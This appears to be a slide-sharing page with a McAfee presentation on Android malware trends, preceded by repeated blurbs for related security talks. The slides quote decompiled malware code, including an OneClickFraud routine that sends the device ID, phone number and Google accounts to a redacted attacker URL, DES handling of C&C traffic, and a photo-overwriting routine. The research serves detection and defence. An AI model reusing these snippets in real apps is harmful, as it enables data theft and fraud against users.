Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.
Automotive Cybersecurity: Test Like a HackerForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover both how to best fit this type of testing into your pipeline to maximize speed and coverage, as well as discuss how to fit this offensive cyber security approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
Automotive Cybersecurity: Test Like a HackerForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover both how to best fit this type of testing into your pipeline to maximize speed and coverage, as well as discuss how to fit this offensive cyber security approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
If they made movies about the most important software security issues, they could be put into five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts in software security nowadays? A talk presented on IT-Weekend event in Ruse, Bulgaria (2017)
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
Between limited resources and a lack of trained professionals on one hand and the increasing quantity and quality of attacks on the other, securing enterprises and responding to incidents has placed defenders on the losing end of a digital arms race. Even managing the amounts of threat data and open-source intelligence has become a challenge.
This talk will cover the possibilities and perils of integrating all the various sources of threat intelligence data to protect an organization. With all the various open-source and paid-source data, simply dumping it all into a firewall or DNS RPZ zone can be problematic. What to do about compromised websites or shared hosting environments? What about DGA domains that use full words and may collide with actual innocent websites? What about how to handle threat data that is lacking in context to make appropriate decisions on its validity and accuracy? This talk will present several case studies in how these problems can be tackled and how using multi-domain analysis can help reduce the risk and maximize the value of automated protection using these types of data.
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityPriyanka Aash
"There are billions of ARM Cortex M based SOC being deployed in embedded systems. Most of these devices are Internet ready and definitely security is always the main concern. Vendors would always apply security measurements into the ARM Cortex M product for few major reasons: 1) People will not be able to copy and replicate the product; 2) License control for the hardware and software; 3) Prevent malicious code injection in to the firmware. Vendors normally rely on the security measurements built within the chip (unique ID number/signature) or security measurements built around the chip (secure boot).
In this talk, we will share the ARM Cortex M SOC vulnerability that we discovered and it will be two parts:
The first is security measurement build within the SOC and how we break it. We could gain control of changing the SOC unique ID and write the firmware or even turn the device into a trojan or bot.
The second is security measure built around the SOC and how we break the Secure Boot elements and write into the firmware."
The TheFatrat is an easy tool to generate backdoor’s with msfvenom (a part
from metasploit framework) and easy post exploitation attack. This tool
compiles a malware with popular payload and then the compiled malware can
be execute on android, windows, Linux. The malware that created with this tool
also have an ability to bypass most AV software protection. Bypassing the Anti-
Virus or Security Software will allow for a metasploit session between the
attacker and the target without Anti-Virus detecting the malicious payload and
flagging a warning back to the user.
Presentation by Saurabh Harit att he mobile security summit in johannesburg 2011.
This presentation is about security on the iPhone and Android platforms. The presentation begins with a discussion on decrypting iPhone apps and its implications. The Android security model is discussed. The presentation ends with a series of discussions on practical Android attacks.
Cant touch this: cloning any Android HCE contactless cardSlawomir Jasek
There is no doubt that mobile contactless payments has grown exponentially and Host Card Emulation – the possibility to emulate payment cards on a mobile device, without dependency on special Secure Element hardware, has also significantly boosted the number of applications.
HCE support for Android is usually delivered as an external, certified “black-box” library to compile in your application. Obviously vendors promise “highest level of security” – including: card data tokenization, “secure element in the cloud”, device fingerprinting, phone unlock requirement, code obfuscation, additional authorization, etc. For mobile payments, they often successfully convince implementing bank that it is technically impossible to “clone” a virtual card from owner’s device to another one.
Based on several assessments, we have noticed that even IT security representatives were surprised by the possibilities of mobile malware to attack the process. Not to mention risk departments, which took into consideration only a few limited-value fraudulent transactions made by an accidental thief using a stolen phone. Therefore, delivering the PoC demo of card cloning to a different device, every time caused confusion and uncertainty the least. Furthermore, proving that the intruder is also able to renew virtual card tokens, or make payments for higher amounts, turned out to be a shock.
With introduction of root-exploiting financial malware, they already have technical means to attack HCE. Therefore it is now crucial to understand associated risks, and properly plan mitigation ahead. This presentation will start with a short introduction on HCE – including “ISIS”‘s role in its complicated history, current coverage and growth predictions, basics of operation, typical infrastructure and differences in hardware Secure Element. We will cover several possibilities to attack HCE including a universal method of cloning any Android contactless payment (including Google’s own Android Pay) to a different device. Several layers of security mechanisms to mitigate the risk will be presented along with some statistics on methods used by current applications. The audience will leave with a deep understanding of HCE technology and its limitations, along with exemplary solutions to potential problems.
Brick all the internet of things!(with notes)Jimmy Shah
Recently someone released a worm on the Internet that targeted IoT devices. In the past similar worms turned your Internet connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them. The better to prevent them from possibly being turned into weapons of mass denial of service.
We'll cover why that's a Bad Idea. And what are more constructive ways to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.
There's no S(ecurity) in IoT: This is why we can't sleepJimmy Shah
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
More Related Content
Similar to Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
If they made movies about the most important software security issues, they could be put into five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts in software security nowadays? A talk presented on IT-Weekend event in Ruse, Bulgaria (2017)
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
Between limited resources and a lack of trained professionals on one hand and the increasing quantity and quality of attacks on the other, securing enterprises and responding to incidents has placed defenders on the losing end of a digital arms race. Even managing the amounts of threat data and open-source intelligence has become a challenge.
This talk will cover the possibilities and perils of integrating all the various sources of threat intelligence data to protect an organization. With all the various open-source and paid-source data, simply dumping it all into a firewall or DNS RPZ zone can be problematic. What to do about compromised websites or shared hosting environments? What about DGA domains that use full words and may collide with actual innocent websites? What about how to handle threat data that is lacking in context to make appropriate decisions on its validity and accuracy? This talk will present several case studies in how these problems can be tackled and how using multi-domain analysis can help reduce the risk and maximize the value of automated protection using these types of data.
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityPriyanka Aash
"There are billions of ARM Cortex M based SOC being deployed in embedded systems. Most of these devices are Internet ready and definitely security is always the main concern. Vendors would always apply security measurements into the ARM Cortex M product for few major reasons: 1) People will not be able to copy and replicate the product; 2) License control for the hardware and software; 3) Prevent malicious code injection in to the firmware. Vendors normally rely on the security measurements built within the chip (unique ID number/signature) or security measurements built around the chip (secure boot).
In this talk, we will share the ARM Cortex M SOC vulnerability that we discovered and it will be two parts:
The first is security measurement build within the SOC and how we break it. We could gain control of changing the SOC unique ID and write the firmware or even turn the device into a trojan or bot.
The second is security measure built around the SOC and how we break the Secure Boot elements and write into the firmware."
The TheFatrat is an easy tool to generate backdoor’s with msfvenom (a part
from metasploit framework) and easy post exploitation attack. This tool
compiles a malware with popular payload and then the compiled malware can
be execute on android, windows, Linux. The malware that created with this tool
also have an ability to bypass most AV software protection. Bypassing the Anti-
Virus or Security Software will allow for a metasploit session between the
attacker and the target without Anti-Virus detecting the malicious payload and
flagging a warning back to the user.
Presentation by Saurabh Harit att he mobile security summit in johannesburg 2011.
This presentation is about security on the iPhone and Android platforms. The presentation begins with a discussion on decrypting iPhone apps and its implications. The Android security model is discussed. The presentation ends with a series of discussions on practical Android attacks.
Cant touch this: cloning any Android HCE contactless cardSlawomir Jasek
There is no doubt that mobile contactless payments has grown exponentially and Host Card Emulation – the possibility to emulate payment cards on a mobile device, without dependency on special Secure Element hardware, has also significantly boosted the number of applications.
HCE support for Android is usually delivered as an external, certified “black-box” library to compile in your application. Obviously vendors promise “highest level of security” – including: card data tokenization, “secure element in the cloud”, device fingerprinting, phone unlock requirement, code obfuscation, additional authorization, etc. For mobile payments, they often successfully convince implementing bank that it is technically impossible to “clone” a virtual card from owner’s device to another one.
Based on several assessments, we have noticed that even IT security representatives were surprised by the possibilities of mobile malware to attack the process. Not to mention risk departments, which took into consideration only a few limited-value fraudulent transactions made by an accidental thief using a stolen phone. Therefore, delivering the PoC demo of card cloning to a different device, every time caused confusion and uncertainty the least. Furthermore, proving that the intruder is also able to renew virtual card tokens, or make payments for higher amounts, turned out to be a shock.
With introduction of root-exploiting financial malware, they already have technical means to attack HCE. Therefore it is now crucial to understand associated risks, and properly plan mitigation ahead. This presentation will start with a short introduction on HCE – including “ISIS”‘s role in its complicated history, current coverage and growth predictions, basics of operation, typical infrastructure and differences in hardware Secure Element. We will cover several possibilities to attack HCE including a universal method of cloning any Android contactless payment (including Google’s own Android Pay) to a different device. Several layers of security mechanisms to mitigate the risk will be presented along with some statistics on methods used by current applications. The audience will leave with a deep understanding of HCE technology and its limitations, along with exemplary solutions to potential problems.
Similar to Isn't it all just SMS-sending trojans?: Real Advances in Android Malware (20)
Brick all the internet of things!(with notes)Jimmy Shah
Recently someone released a worm on the Internet that targeted IoT devices. In the past similar worms turned your Internet connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them. The better to prevent them from possibly being turned into weapons of mass denial of service.
We'll cover why that's a Bad Idea. And what are more constructive ways to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.
There's no S(ecurity) in IoT: This is why we can't sleepJimmy Shah
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTJimmy Shah
Mobile devices are not simply PCs. While one knows to look for an Advanced Persistent Threat(APT) on their desktop endpoints, mobile tends to be ignored. Setting up an MDM solution is not enough. Installing AV on as many devices as possible is not enough. The holes in the net are still too wide; attackers have more options than just malicious apps for getting on your network.
Topics covered will be:
How attackers are moving to mobile in order to bypass traditional protection.
Apps are only one part of the problem. Documents, email, messaging are still left wide open
Bypassing Mobile Antivirus
Bypassing MDM, MAM and Containers
Attackers are turning from apps to exploits.
Finally we’ll cover what to do next – how to effectively deal with Mobile APT.
Solar Powered Parking Meters - An IoT thought experimentJimmy Shah
The Internet of Things is not as complex as one would think. Objects(e.g. Power meters, Fridge computers, etc.) or "Things" don;t have their own Internet, instead they "speak" to each other over the same Internet we all use. There lies their vulnerability. Assuming that since the machines will only talk to each other, that no one will eavesdrop or intrude on their conversation. Security researchers have a saying, "Security through Obscurity is no Security".
The presentation shows how the Internet of Things' veil of obscurity can be pierced by an attacker(or more likely a Security Researcher) would assess a particular Smart Parking Meter ecosystem. Only open source intelligence(OSINT)[e.g. patents, newspaper articles] was used to compile the information on:
* parking meters
* mesh networking
* machine2machine(m2m) SIMs
* management consoles
* RF usage
Viruses on mobile platforms why we don't/don't we have viruses on android_Jimmy Shah
This presentation will discuss the resources available to attackers to write Android viruses, including methods of infecting executables, gaining control from the original app and avoiding detection.
Mobile malware heuristics the path from 'eh' to pretty good'Jimmy Shah
The 'Platypus' talk
Malware on mobile phones is rapidly increasing. There are many reasons for this, but the primary one is the ease of monetizing malware on mobile phones, Attackers are incentivized to create more malware faster and cheaper. They are overwhelming the limited resources of malware researchers with this glut of cheap and "good enough" malware. Malware can be identified by humans, but there is insufficient time to handle all that is released daily by malware writers. There is a need to develop both better heuristics and the tools that let an analyst separate the wheat from the chaff. The presentation will cover not just the development of heuristics for mobile malware, but also its path from simple detection to more advanced and more successful(i.e fewer false positives) detection. Along the way we will cover the missteps and pitfalls that slow the development of automation.
Smartphone Ownage: The state of mobile botnets and rootkitsJimmy Shah
Symbian Botnet? Mobile Linux Rootkits? iPhone Botnets? Millions of phones at risk? The press coverage on smart phone threats is at times somewhat accurate, distant, and occasionally (if unintentionally) misleading. They tend to raise questions such as: How close to PC levels (100,000+ to millions of nodes) have mobile botnets reached? Have mobile rootkits reached the complexity of those on the PC?
This talk covered the state of rootkits and botnets on smart phones from the perspective of anti-malware researchers, including demystification of the threat from mobile rootkits and mobile botnets, the differences (if any) between mobile rootkits and mobile botnets vs. their PC counterparts, and a look at how samples seen in the wild and researcher PoCs function.
Smartphone Ownage: The state of mobile botnets and rootkits
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
1. McAfee Confidential—Internal Use Only
Isn't it all just SMS-sending trojans?:
Real advances in Android Malware
Jimmy Shah
Mobile Security Researcher
6. Attacker Tricks - Encryption
• Simple
– Obfuscations
• Hiding SMS numbers/message text within plaintext HTML files
– Substitution cipher
• Config file containing encrypted SMS numbers/message text
<link rel="stylesheet" type="text/css" href="/en/shar
ed/core/2/css/css.ashx?sc=/en/us/site.config&pt=cspMscomHomePage&c=cspMscomSiteBrand;cspSearchComponent
;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVe
rticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js">
</script><meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Get
product information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c
<SMS#>::<MSG>::241.55руб.
<SMS#>::<MSG>::173.88руб.
<SMS#>::<MSG>::86.00руб.
7. Attacker Tricks - Encryption
• Complex
– Symmetric cipher
• DES
• Encrypt URL queries and C&C commands
• Encrypt/decrypt config file
– URLs, next connect time
– Encrypt/decrypt C&C commands
– Decrypt root exploits
byte abyte1[] = k.b;
DESKeySpec deskeyspec = new DESKeySpec(abyte1);
javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec);
Cipher cipher = Cipher.getInstance("DES");
b = cipher;
cipher.init(2, secretkey);
8. Attacker Tricks – Fraud
• Pretending to be a legitimate app
– Not the same as injecting malicious code
– New or reused code that simulates the real app
• Includes malicious functions
• Almost just malicious code
./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class
./com/example/android/service/R$id.class
./com/example/android/service/R$raw.class
./com/example/android/service/Main$KitchenTimerReceiver.class
./com/example/android/service/KitchenTimerService$2.class
./com/example/android/service/R$attr.class
./com/example/android/service/R$layout.class
./com/example/android/service/R.class
./com/example/android/service/Main.class
./com/example/android/service/R$drawable.class
./com/example/android/service/KitchenTimerService$1.class
./com/example/android/service/KitchenTimerService.class
./com/example/android/service/Main$1.class
./com/example/android/service/R$string.class
./token/bot/StartSettings.class
./token/bot/WebApi.class
./token/bot/CatchResult.class
./token/bot/SendSmsResult.class
./token/bot/SettingsSet.class
./token/bot/ScreenItem.class
./token/bot/AutorunReceiver.class
./token/bot/ServerResponse.class
./token/bot/MainActivity.class
./token/bot/ThreadOperation.class
./token/bot/AlarmReceiver.class
./token/bot/ThreadOperationListener.class
./token/bot/SmsReciver.class
./token/bot/MainApplication.class
./token/bot/MainService.class
./token/bot/SmsItem.class
./token/bot/HttpParam.class
./token/bot/Settings.class
./token/bot/UpdateActivity.class
./token/bot/MainActivity$1.class
Android/OneClickFraud
Android/FakeToken
10. Attacker Tricks – Fraud
• Android/OneClickFraud
– Fake adult entertainment app
• App asks for the user to pay for a subscription to the adult site
– Repeats every 5 minutes
public void onReceive(Context paramContext, Intent paramIntent)
{
kitchenTimerService.schedule(300000L);
setContentView(2130903040);
Account[] arrayOfAccount;
11. Attacker Tricks – Fraud
• Android/OneClickFraud
– Sends user information including Google account to the attacker
if (ctf.intValue() == 0)
{
Main localMain = Main.this;
Integer localInteger = Integer.valueOf(1);
localMain.ctf = localInteger;
TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
arrayOfAccount = AccountManager.get(Main.this).getAccounts();
str1 = "";
int i = arrayOfAccount.length;
j = 0;
if (j >= i)
{
String str2 = doPost("http://<removed>", "");
StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>");
String str3 = localTelephonyManager.getDeviceId();
StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno=");
String str4 = localTelephonyManager.getLine1Number();
Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2);
Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1);
startActivity(localIntent1);
boolean bool = moveTaskToBack(1);
}
}
12. 4/19/1212
Attacker Tricks - Injecting code
• Android/Moghava.A
– Malicious code injected into a legitimate app
• Recipes for Iranian meals
13. 4/19/1213
Attacker Tricks - Injecting code
• Android/Moghava.A
– Real virus
• Overwriting file infector
– Not executable files, just image files
» Specifically all of your JPGs
» Designed to “photo bomb” all your photos with the Ayotollah
Khomeni
• Code injection:
– Buggy
• Doesn't check if it's infected a file before
./com/Moghava/kicker.smali
./com/Moghava/stamper$1.smali
./com/Moghava/stamper$1$1.smali
./com/Moghava/stamper.smali
./ir/sharif/iranianfoods/R$attr.smali
./ir/sharif/iranianfoods/R$styleable.smali
./ir/sharif/iranianfoods/R$menu.smali
./ir/sharif/iranianfoods/ListItemAdapter.smali
./ir/sharif/iranianfoods/IranData.smali
./ir/sharif/iranianfoods/Touch$AddImgAdp.smali
./ir/sharif/iranianfoods/TabHostActivity.smali
./ir/sharif/iranianfoods/Constants.smali
14. 4/19/1214
Attacker Tricks - Injecting code
localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505);
localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath());
int m = localBitmap2.getWidth();
int n = localBitmap1.getWidth();
int i1 = m;
int i2 = n;
if (i1 > i2)
{
i3 = localBitmap2.getWidth();
i4 = localBitmap2.getHeight();
label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888;
localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig);
Canvas localCanvas = new Canvas(localBitmap3);
float f1 = 0.0F;
float f2 = 0.0F;
Paint localPaint1 = null;
localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1);
float f3 = 100.0F;
float f4 = 300.0F;
Paint localPaint2 = null;
localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2);
}
16. 4/19/1216
Attacker Tricks – Recording Audio
• Audio
– DTMF(“Touch Tones”)
– Telephone Calls
• Initially used in academic PoCs
– SoundComber
• DB of IVR Converted DTMF
• January 2011
• Very common in spyware
• Used in malware
17. 4/19/1217
Attacker Tricks – Recording Audio
• Android/Nickispy
– Records to AMR files
– August 2011
• Android/GoldenEagle
– Records to AMR files
– September 2011
• Audio recording benefits
– Trade secrets
– CC#
– PINs
18. 4/19/1218
Attacker Tricks - Malware Updates
• Malware authors are now including update functionality
– Keeping the profits rolling in and maintaining control of devices
– Initially just used by mobile botnet clients
• Generally only requires the permission INSTALL_PACKAGES
• android.permission.INSTALL_PACKAGES
• There are two main ways users are attacked
– Fake legitimate updates
• Ex: SYSTEM_PATCH, Android_4.0_patch
• Really just trojan horses
– Malware updating itself
• More functions
– Send sensitive user info
– Exfiltrate data
• New/patched payloads
– Exploits
19. 4/19/1219
Attacker Tricks - Malware Updates
• Real malware updates
– Because even the bad guys understand that sometimes you need to patch
• Usually not visual
– Don't inform the users/victims
– Don't depend on users to approve updates
20. 4/19/1220
Academic Research - Taplogger
• Taplogger
– Combination training and attack app
• Reads accelerometer for keypresses
• Training app is a fake icon matching game
– High score = trained it to steal your pin
• Two attacks
– Number pad logging
» PINs, CC#s,etc.
– Password stealing
» Screen unlock
– Previous research
• Touchlogger
– Two parts – training and logging
• ACCessory
– Detects full keyboard
22. Attacker Tricks - Rooting Exploits
• Rooting Android
– Good for improving security, but can leave you open to attack
– Replacing firmware
– Removing bloatware and security vulnerabilities
• Most attackers are not interested in developing their own exploits
– Function of slow patching on Android and number of parties involved in
releasing new firmware
• “too many chefs in the kitchen”
– Leads to the same three or four common exploits and minor modifications
Exploit Detected as
PSneuter Exploit/RetuenSP.A
Gingerbreak Exploit/Voldbrk, 18 minor variants of the
same exploit
Exploid Exploit/Lvedu, 26 minor variants
RageAgainstTheCage Exploit/Diutes, 5 minor variants
23. Attacker Tricks – Server-Side Polymorphism
• Server-side
– Uses larger resources server side vs. lower powered devices
– Modifying DEX files
• Manual changes
– Renaming source and recompiling
• Automated changes
– Easier than it sounds
– Scriptable text changes in source
24. Attacker Tricks – Server-Side Polymorphism
• One major family: Android/FakeInstaller
• Main generic signature
• Supplementary detections for 25 variants
• Changes
– By day
– By hour
A lot of SMS sending trojans use very simple encryption or obfuscation.
The top one hides the SMS number and message in a standard HTML file. It looks like the attacker possible modified a standard Microsoft provided HTML file. If you&apos;re not looking for it you&apos;d miss it.
Others use very simple substitution ciphers. All of this just to make it less obvious what the SMS number and message are.
Of course if you have the binary, these are easy to reverse.
More advanced malware uses better algorithms like DES. Geinimi uses DES to encrypt its CC traffic and URL queries.
This is a research PoC. It&apos;s in two parts, a desktop application to identify keystrokes from accelrometer readings and eventually an app that uses the derived keystroke/touch databse to identify indiividual numbers.
Future imporvements include expanding from a custom keyboard to the default on-screen keyboard and identification of letters.
The attacker profits initially by identifying when numbers are enterd These can be cc#, SS# or PINs. Future work could capture passwords, acount names and other sensitive data.
Botnets are pretty straightforward. They&apos;re basically client server networks where the clients are infected machines. An attacker infects a large number of machines or devices and then has their command and control server.
Command and control can varie from the simple single server to a network of redundant servers.
Botnets are good for performing attacks against targets(ddos, phishing, etc.) and for gathering informatin, Personally identifiable information, financial records and other confidential informatioon.
Depending on how complex they are the botnet clients may also utilize features of rootkits.